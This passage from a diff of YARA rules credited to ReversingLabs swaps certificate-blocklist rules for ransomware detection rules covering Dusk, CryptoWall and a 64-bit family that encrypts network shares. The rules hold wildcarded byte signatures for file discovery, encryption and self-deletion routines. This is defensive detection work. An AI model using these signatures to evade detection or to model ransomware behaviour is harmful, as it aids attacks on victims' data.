?? ?? 90 48 + 8D 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 90 0F B6 C0 85 C0 0F 85 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 83 + C0 ?? 48 8D 94 24 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 90 48 8D 15 ?? ?? ?? ?? 48 8D + 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? + E8 ?? ?? ?? ?? 90 4C 8B C0 48 8D 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 90 4C 8B C0 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C + 8D 05 ?? ?? ?? ?? 48 8B D0 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B D0 48 8D + 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D + 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D + 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8D 84 24 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 + 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8D 05 ?? ?? ?? ?? 48 8B D0 48 8D 8C 24 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B D0 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D + 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B + } + $encrypt_network_shares_win64_p2 = { + 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8B C0 48 8D 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8B C0 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 90 4C 8D 05 ?? ?? ?? ?? 48 8B D0 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 90 48 8B D0 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 90 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8B C0 48 8D 94 24 ?? ?? ?? + ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8B C0 48 8D 15 ?? ?? ?? ?? 48 8D 8C + 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8D 05 ?? ?? ?? ?? 48 8B D0 48 8D 8C 24 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 90 48 8B D0 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 90 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 94 24 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 0F B6 C0 85 C0 0F 85 ?? ?? ?? + ?? 48 C7 44 24 ?? ?? ?? ?? ?? EB ?? 48 8B 44 24 ?? 48 FF C0 48 89 44 24 ?? 48 8D 8C + 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 39 44 24 ?? 73 ?? 48 83 7C 24 ?? ?? 76 ?? 33 D2 + 48 8B 44 24 ?? B9 ?? ?? ?? ?? 48 F7 F1 48 8B C2 48 85 C0 75 ?? 41 B9 ?? ?? ?? ?? 4C + } + $encrypt_network_shares_win64_p3 = { + 8D 05 ?? ?? ?? ?? 48 8B 54 24 ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B 44 + 24 ?? 48 FF C0 48 89 44 24 ?? EB ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? + ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8B C0 48 8D 54 24 ?? 48 8D 8C 24 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 48 8D 15 ?? ?? ?? ?? + 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 48 8D 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 90 4C 8B C0 48 8D 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? + ?? 90 48 8B C8 E8 ?? ?? ?? ?? 90 4C 8B C0 48 8D 54 24 ?? 48 8D 8C 24 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 90 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? + E8 ?? ?? ?? ?? 90 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8B C0 48 8D 94 24 ?? + ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B C8 E8 ?? ?? ?? ?? 90 4C 8B + C0 48 8D 54 24 ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? + E8 ?? ?? ?? ?? 90 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 C6 44 24 ?? ?? 48 8D 8C 24 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 90 0F B6 44 24 ?? EB ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 90 32 C0 48 8B 8C 24 ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 90 48 81 C4 ?? ?? ?? ?? C3 + } + $find_files_win64 = { + 48 89 5C 24 ?? 55 56 57 41 56 41 57 48 81 EC ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33 + C4 48 89 84 24 ?? ?? ?? ?? 4D 8B F0 49 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 8B E9 48 3B D1 + 74 ?? 0F B7 02 66 83 E8 ?? 66 83 F8 ?? 77 ?? 0F B7 C0 49 0F A3 C0 72 ?? 48 83 EA ?? + 48 3B D5 75 ?? 0F B7 0A 66 83 F9 ?? 75 ?? 48 8D 45 ?? 48 3B D0 74 ?? 4D 8B CE 45 33 + C0 33 D2 48 8B CD E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 66 83 E9 ?? 33 FF 66 83 F9 ?? 77 ?? + 0F B7 C1 49 0F A3 C0 B0 ?? 72 ?? 40 8A C7 48 2B D5 48 8D 4C 24 ?? 48 D1 FA 41 B8 ?? + ?? ?? ?? 48 FF C2 F6 D8 4D 1B FF 4C 23 FA 33 D2 E8 ?? ?? ?? ?? 45 33 C9 89 7C 24 ?? + 4C 8D 44 24 ?? 48 89 7C 24 ?? 33 D2 48 8B CD FF 15 ?? ?? ?? ?? 48 8B D8 48 83 F8 ?? + 75 ?? 4D 8B CE 45 33 C0 33 D2 48 8B CD E8 ?? ?? ?? ?? 8B F8 48 83 FB ?? 74 ?? 48 8B + CB FF 15 ?? ?? ?? ?? 8B C7 48 8B 8C 24 ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 48 8B 9C + 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 41 5F 41 5E 5F 5E 5D C3 49 8B 76 ?? 49 2B 36 48 + C1 FE ?? 66 83 7C 24 ?? ?? 75 ?? 66 39 7C 24 ?? 74 ?? 66 83 7C 24 ?? ?? 75 ?? 66 39 + 7C 24 ?? 74 ?? 4D 8B CE 48 8D 4C 24 ?? 4D 8B C7 48 8B D5 E8 ?? ?? ?? ?? 85 C0 75 ?? + 48 8D 54 24 ?? 48 8B CB FF 15 ?? ?? ?? ?? 85 C0 75 ?? 49 8B 06 49 8B 56 ?? 48 2B D0 + 48 C1 FA ?? 48 3B F2 0F 84 ?? ?? ?? ?? 48 2B D6 48 8D 0C F0 4C 8D 0D ?? ?? ?? ?? 41 + B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Kompaniya Auttek" and pe.signatures[i].serial=="15:c5:af:15:af:ec:f1:c9:00:cb:ab:0c:a9:16:56:29" and 1586091840<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($find_files_win64) and ( all of ($encrypt_files_win64_p*)) and ( all of ($encrypt_network_shares_win64_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_476De2F108D20B43Ba3Bae6F331Af8F1 : INFO FILE +rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Dusk : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Dusk ransomware." author = "ReversingLabs" - id = "5a741e6d-9b58-5536-8987-b3c36cdfcd5f" - date = "2023-11-08" - modified = "2023-11-08" + id = "cde30f40-f13c-53da-8656-cc293433aa36" + date = "2021-08-12" + modified = "2021-08-12" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L4216-L4232" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "e5edf3e15b2139ba6cd85f2cfea63b53f7fa36a3fd7224a4a9ccbe5de6eb6f1d" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/ByteCode.MSIL.Ransomware.Dusk.yara#L1-L73" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "b6b0b3be7c17115dc5f225a13228f8a4811d84ae095c3ceba2d89f569f2d40c7" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Dusk" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Digiwill Limited" and pe.signatures[i].serial=="47:6d:e2:f1:08:d2:0b:43:ba:3b:ae:6f:33:1a:f8:f1" and 1588135722<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_08Ddcc67F8Cad6929607E4Cda29B3503 : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "3563547f-556b-56e3-ad25-cfec0294fe93" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L4234-L4250" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "4cd975312ca825b51f34f5c89184a56526877436224c1e7407d715b28ebfd9d5" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $encrypt_files_p1 = { + 03 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 04 6F ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 06 6F ?? ?? ?? ?? + 0A 06 28 ?? ?? ?? ?? 0B 03 07 28 ?? ?? ?? ?? 03 03 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? + ?? ?? ?? DE ?? 26 DE ?? 2A + } + $encrypt_files_p2 = { + 14 0A 1E 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 73 ?? ?? ?? ?? 0C 73 ?? ?? + ?? ?? 0D 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 03 07 20 ?? + ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? + ?? ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 17 6F ?? ?? ?? + ?? 08 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 11 ?? 02 16 02 8E 69 6F ?? ?? ?? ?? 11 + ?? 6F ?? ?? ?? ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 08 6F ?? ?? ?? ?? 0A DE ?? + 09 2C ?? 09 6F ?? ?? ?? ?? DC 08 2C ?? 08 6F ?? ?? ?? ?? DC 06 2A + } + $dusk_delete_itself = { + 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 1A 8D ?? ?? ?? ?? 25 16 + 72 ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? 03 28 ?? ?? ?? ?? A2 25 18 72 ?? ?? ?? ?? 28 ?? + ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 25 19 72 ?? ?? ?? ?? A2 0B 06 07 28 ?? ?? ?? + ?? 06 06 28 ?? ?? ?? ?? 18 60 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 06 73 ?? ?? + ?? ?? 25 17 6F ?? ?? ?? ?? 25 16 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 04 28 ?? ?? ?? ?? 28 + ?? ?? ?? ?? DE ?? 26 DE ?? 2A + } + $find_files = { + 20 ?? ?? ?? ?? 72 ?? ?? ?? ?? A2 25 20 ?? ?? ?? ?? 72 ?? ?? ?? ?? A2 25 20 ?? ?? ?? ?? + 72 ?? ?? ?? ?? A2 0A 1F ?? 8D ?? ?? ?? ?? 25 16 1F ?? 28 ?? ?? ?? ?? A2 25 17 1E 28 ?? + ?? ?? ?? A2 25 18 1F ?? 28 ?? ?? ?? ?? A2 25 19 1F ?? 28 ?? ?? ?? ?? A2 25 1A 1F ?? 28 + ?? ?? ?? ?? A2 25 1B 1B 28 ?? ?? ?? ?? A2 25 1C 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? + ?? ?? 28 ?? ?? ?? ?? A2 25 1D 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? + ?? A2 25 1E 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 25 1F ?? 72 + ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 0B 16 0C 2B ?? 07 08 9A 0D + 1F ?? 28 ?? ?? ?? ?? 13 ?? 09 72 ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 + ?? 11 ?? 9A 28 ?? ?? ?? ?? 13 ?? 06 11 ?? 28 ?? ?? ?? ?? 2C ?? 02 11 ?? 11 ?? 9A 11 ?? + 28 ?? ?? ?? ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 32 ?? 00 02 09 28 ?? ?? ?? ?? DE ?? + 26 DE ?? 08 17 58 0C 08 07 8E 69 32 ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 20 ?? ?? ?? ?? + 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? + ?? 26 DE ?? 26 DE ?? 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 20 + ?? ?? ?? ?? 6F ?? ?? ?? ?? 2A + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "FAN-CHAI, TOV" and pe.signatures[i].serial=="08:dd:cc:67:f8:ca:d6:92:96:07:e4:cd:a2:9b:35:03" and 1564310268<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($find_files) and ( all of ($encrypt_files_p*)) and ($dusk_delete_itself) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_052242Ace583Adf2A3B96Adcb04D0812 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Cryptowall : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects CryptoWall ransomware." author = "ReversingLabs" - id = "22104929-e2c5-565c-975c-826f666e78e2" - date = "2023-11-08" - modified = "2023-11-08" + id = "06d8b106-d69a-526a-8e16-c95d39eb2993" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L4252-L4268" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "e1593a2bf375912e411d5f19d9e232c6b87f0897bb6f1c0b0539380b34b05af5" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.CryptoWall.yara#L3-L312" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "74baa04ee506732e0bb64a77cfd2d2216fcc978f13447ef07862e0116c093c14" score = 75 - quality = 90 - tags = "INFO, FILE" + quality = 88 + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "CryptoWall" + tc_detection_factor = 5 importance = 25 + strings: + $v30_entrypoint = { + 55 8B EC 83 EC ?? E8 ?? ?? ?? ?? 85 C0 0F 84 9A 00 00 00 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 7E C7 45 ?? ?? ?? ?? ?? + 8D 45 ?? 50 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 65 8B 4D ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 + E8 ?? ?? ?? ?? 8B 40 ?? A3 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 + 75 19 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 6A + ?? 6A ?? E8 ?? ?? ?? ?? 8B 50 ?? FF D2 33 C0 8B E5 5D C2 + } + $v20_entrypoint = { + 55 8B EC 83 EC ?? E8 ?? ?? ?? ?? 85 C0 0F 84 A3 00 00 00 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 85 83 00 00 00 C7 45 ?? + ?? ?? ?? ?? 8D 45 ?? 50 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 6A 8B 4D ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 90 ?? ?? + ?? ?? FF D2 E8 ?? ?? ?? ?? 8B 40 ?? A3 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 83 C4 ?? 85 C0 75 19 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 + E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 8B 50 ?? FF D2 33 C0 8B E5 5D C2 + } + $v30_api_load = { + 55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 06 83 7D ?? ?? 75 08 8B 45 ?? E9 50 01 00 00 8B 45 ?? 50 E8 ?? ?? + ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 0F 84 34 01 00 00 B9 ?? ?? ?? ?? 6B D1 ?? 8B 45 ?? 8B 4D ?? 03 4C 10 ?? 89 4D ?? 8B + 55 ?? 8B 45 ?? 03 42 ?? 89 45 ?? 8B 4D ?? 8B 55 ?? 03 51 ?? 89 55 ?? 8B 45 ?? 8B 4D ?? 03 48 ?? 89 4D ?? C7 45 ?? ?? ?? + ?? ?? EB 09 8B 55 ?? 83 C2 ?? 89 55 ?? 8B 45 ?? 8B 4D ?? 3B 48 ?? 0F 83 DA 00 00 00 8B 55 ?? 8B 45 ?? 8B 4D ?? 03 0C 90 + 51 E8 ?? ?? ?? ?? 83 C4 ?? 3B 45 ?? 0F 85 B7 00 00 00 BA ?? ?? ?? ?? 6B C2 ?? 8B 4D ?? 8B 54 01 ?? 8B 44 01 ?? 89 55 ?? + 89 45 ?? 8B 4D ?? 8B 55 ?? 0F B7 04 4A 8B 4D ?? 8B 14 81 3B 55 ?? 76 71 8B 45 ?? 8B 4D ?? 0F B7 14 41 8B 45 ?? 03 45 ?? + 8B 4D ?? 39 04 91 73 59 8B 55 ?? 8B 45 ?? 0F B7 0C 50 8B 55 ?? 8B 45 ?? 03 04 8A 89 45 ?? 74 3F 6A ?? 8B 4D ?? 51 E8 ?? + ?? ?? ?? 83 C4 ?? 8B 55 ?? 8D 44 02 ?? 50 8D 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 8D 45 ?? 50 6A ?? 8D 4D ?? + 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 40 ?? FF D0 EB 16 8B 4D ?? 8B 55 ?? 0F B7 04 4A 8B 4D ?? 8B 55 ?? 03 14 81 89 55 ?? EB + 05 E9 0E FF FF FF 8B 45 ?? 8B E5 5D C3 + } + $v30_dll_load = { + 55 8B EC 83 EC ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 58 8B 45 ?? 8B 48 ?? 89 4D ?? 8B 55 ?? 83 C2 ?? 89 55 ?? 8B 45 + ?? 8B 08 89 4D ?? 8B 55 ?? 3B 55 ?? 74 36 8B 45 ?? 89 45 ?? 8B 4D ?? 0F B7 51 ?? D1 EA 52 8B 45 ?? 8B 48 ?? 51 E8 ?? ?? + ?? ?? 83 C4 ?? 3B 45 ?? 75 08 8B 55 ?? 8B 42 ?? EB 0C 8B 45 ?? 8B 08 89 4D ?? EB C2 33 C0 8B E5 5D C3 + } + $v30_calculate_hash = { + 55 8B EC 83 EC ?? 56 C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 5E 83 7D ?? ?? 74 58 8B 45 ?? 89 45 ?? 8B 4D ?? 89 4D ?? 8B 55 + ?? 83 EA ?? 89 55 ?? 83 7D ?? ?? 74 3D 8B 45 ?? 66 8B 08 66 89 4D ?? 8B 75 ?? C1 EE ?? 0F B7 55 ?? 52 E8 ?? ?? ?? ?? 83 + C4 ?? 0F B7 C0 33 45 ?? 25 ?? ?? ?? ?? 33 34 85 ?? ?? ?? ?? 89 75 ?? 8B 4D ?? 83 C1 ?? 89 4D ?? EB AE 8B 45 ?? 83 F0 ?? + 5E 8B E5 5D C3 + } + $v30_1_find_file_1 = { + 55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 06 83 7D ?? ?? 75 08 8B 45 ?? E9 47 02 00 00 E8 ?? ?? ?? ?? 89 45 + ?? 83 7D ?? ?? 0F 84 32 02 00 00 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 8B 45 ?? 50 E8 ?? ?? ?? + ?? 83 C4 ?? 8B 4D ?? 0F B7 54 41 ?? 83 FA ?? 74 16 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 68 + ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? + ?? 0F 84 B2 01 00 00 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 89 45 ?? 83 7D ?? ?? 0F 84 84 01 00 + 00 C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 8B 11 83 E2 ?? 0F 85 A0 00 00 00 C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? 50 E8 ?? ?? ?? + ?? 83 C4 ?? 85 C0 0F 85 80 00 00 00 8D 4D ?? 51 8B 55 ?? 83 C2 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 69 C7 45 ?? ?? ?? + ?? ?? 8D 45 ?? 50 8B 4D ?? 83 C1 ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 47 8B 45 ?? 50 8B 4D ?? 8B 11 52 8B + 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 75 1C 8B 4D ?? 83 C1 ?? 89 4D ?? 8B 55 ?? 8B 42 ?? 50 8B 4D ?? 51 + } + $v30_1_find_file_2 = { + E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? EB 67 8B 45 ?? 83 C0 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 + 54 C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 51 8B 55 ?? 83 C2 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 32 8B 4D ?? 51 E8 + ?? ?? ?? ?? 83 C4 ?? 85 C0 75 16 8B 55 ?? 52 8B 45 ?? 50 E8 30 FE FF FF 83 C4 ?? 03 45 ?? 89 45 ?? 8B 4D ?? 51 E8 ?? ?? + ?? ?? 83 C4 ?? 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 85 C0 0F 85 CE FE FF FF 8B 55 ?? 52 E8 ?? + ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 83 7D ?? ?? 74 2E 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 + C4 ?? 3D ?? ?? ?? ?? 74 0E 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 89 4D ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 + ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 8B E5 5D C3 + } + $v30_2_find_file_1 = { + 55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 06 83 7D ?? ?? 75 08 8B 45 ?? E9 ( 3B | 3D ) 02 00 00 E8 ?? ?? ?? + ?? 89 45 ?? 83 7D ?? ?? 0F 84 ( 26 | 28 ) 02 00 00 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? 